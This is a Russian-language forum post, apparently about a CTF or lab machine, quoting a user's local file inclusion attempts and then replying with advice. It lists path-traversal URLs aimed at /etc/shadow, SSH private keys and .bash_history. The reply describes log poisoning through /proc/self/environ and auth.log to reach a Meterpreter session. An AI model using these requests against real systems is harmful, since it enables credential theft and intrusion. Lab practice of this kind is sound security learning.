
22.07.2021, 10:48
|
|
Участник форума
Регистрация: 01.03.2021
Сообщений: 222
С нами:
2739091
Репутация:
0
|
|
Qulan сказал(а):
Exploitation LFI
Из того что знаю я (пока что), я могу: - Попробовать почитать /etc/shadow и в случае успеха получить хеш пароля системного пользователя
- Попробовать прочитать id_rsa пользователя miguel и reet
- Попробовать почитать .bash_history файл пользователя miguel, возможно там есть креды
- Попробовать получить доступ к конфигурационным файлам веб -сервера Apache
Код:
http://192.168.1.191:8593/index.php?book=../../../../etc/shadow
- без результата
Код:
http://192.168.1.191:8593/index.php?book=../../../../home/miguel/.ssh/id_rsa
- без результата
Код:
http://192.168.1.191:8593/index.php?book=../../../../root/.ssh/id_rsa
- без результата
Код:
http://192.168.1.191:8593/index.php?book=../../../../home/miguel/.bash_history
- без результата
Код:
http://192.168.1.191:8593/index.php?book=../../../../var/log/apache2/access.log
- есть контакт)))
По поводу LFI, можешь еще смотреть на /proc/self/environ, там бывает user-agent, который через BurpSuite меняешь на
Так же есть интересный файл /var/log/auth.log, туда записываются неудачные попытки входа на тот же ssh. Пробуешь зайти на ssh с ником
и смотришь как в терминале
Код:
"Meterpreter session opened"
|
|
|